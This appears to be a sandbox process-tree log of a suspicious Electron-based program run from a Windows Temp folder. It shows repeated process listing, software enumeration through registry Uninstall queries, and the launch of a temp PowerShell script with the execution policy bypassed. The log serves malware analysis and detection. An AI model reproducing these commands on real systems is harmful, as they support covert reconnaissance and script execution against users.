- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=3760 get ExecutablePath"
    3⤵
    PID:3980
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where processid=3760 get ExecutablePath
      4⤵
      PID:4620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
    3⤵
    PID:1536
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
      4⤵
      PID:5324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
    3⤵
    PID:1544
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
      4⤵
      PID:872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip""
    3⤵
    PID:4596
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip"
      4⤵
      PID:7364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook""
    3⤵
    PID:7148
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"
      4⤵
      PID:6872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager""
    3⤵
    PID:3744
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"
      4⤵
      PID:7272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx""
    3⤵
    PID:5160
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"
      4⤵
      PID:5876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime""
    3⤵
    PID:7684
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"
      4⤵
      PID:3868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore""
    3⤵
    PID:1828
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"
      4⤵
      PID:7668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40""
    3⤵
    PID:3240
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"
      4⤵
      PID:6464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data""
    3⤵
    PID:8156
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"
      4⤵
      PID:5744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX""
    3⤵
    PID:3692
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"
      4⤵
      PID:6564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData""
    3⤵
    PID:7380
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"
      4⤵
      PID:6392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack""
    3⤵
    PID:8144
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"
      4⤵
      PID:5508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 110.0 (x64 en-US)""
    3⤵
    PID:4712
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 110.0 (x64 en-US)"
      4⤵
      PID:5152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService""
    3⤵
    PID:6540
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"
      4⤵
      PID:6696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2""
    3⤵
    PID:6840
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"
      4⤵
      PID:4196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us""
    3⤵
    PID:4152
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"
      4⤵
      PID:6380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent""
    3⤵
    PID:2872
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"
      4⤵
      PID:7716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player""
    3⤵
    PID:7140
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"
      4⤵
      PID:7436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC""
    3⤵
    PID:4752
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC"
      4⤵
      PID:7300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}""
    3⤵
    PID:6592
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}"
      4⤵
      PID:4868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}""
    3⤵
    PID:7192
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}"
      4⤵
      PID:1196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}""
    3⤵
    PID:4500
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}"
      4⤵
      PID:7572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}""
    3⤵
    PID:7792
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}"
      4⤵
      PID:7648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}""
    3⤵
    PID:3532
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}"
      4⤵
      PID:7200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}""
    3⤵
    PID:8056
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}"
      4⤵
      PID:4460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}""
    3⤵
    PID:7640
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}"
      4⤵
      PID:2116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}""
    3⤵
    PID:5492
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}"
      4⤵
      PID:6648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}""
    3⤵
    PID:6500
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}"
      4⤵
      PID:6548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}""
    3⤵
    PID:5644
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}"
      4⤵
      PID:6152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}""
    3⤵
    PID:6160
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}"
      4⤵
      PID:5200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{71024AE4-039E-4CA4-87B4-2F64180401F0}""
    3⤵
    PID:5856
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{71024AE4-039E-4CA4-87B4-2F64180401F0}"
      4⤵
      PID:2288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}""
    3⤵
    PID:6768
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}"
      4⤵
      PID:6052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}""
    3⤵
    PID:6544
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}"
      4⤵
      PID:5028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}""
    3⤵
    PID:2436
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}"
      4⤵
      PID:7584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}""
    3⤵
    PID:7516
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}"
      4⤵
      PID:2332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}""
    3⤵
    PID:6932
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}"
      4⤵
      PID:8072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}""
    3⤵
    PID:224
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}"
      4⤵
      PID:6232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}""
    3⤵
    PID:3228
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}"
      4⤵
      PID:7196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}""
    3⤵
    PID:2316
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}"
      4⤵
      PID:8148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}""
    3⤵
    PID:8180
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}"
      4⤵
      PID:2384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}""
    3⤵
    PID:7524
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}"
      4⤵
      PID:7484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}""
    3⤵
    PID:5352
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}"
      4⤵
      PID:7768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}""
    3⤵
    PID:7144
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}"
      4⤵
      PID:4820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}""
    3⤵
    PID:6428
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}"
      4⤵
      PID:5540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\nWTw7NR0fpaT_tezmp.ps1""
    3⤵
    PID:4028
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\nWTw7NR0fpaT_tezmp.ps1"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:2268
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:3544
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:4848
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5896
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:2636
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:2204
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:4488
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5848
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5400
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5548
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:2652
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7244
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7468
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:4084
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5736
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:4248
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7224
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:908
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:1660
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:4600
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:4356
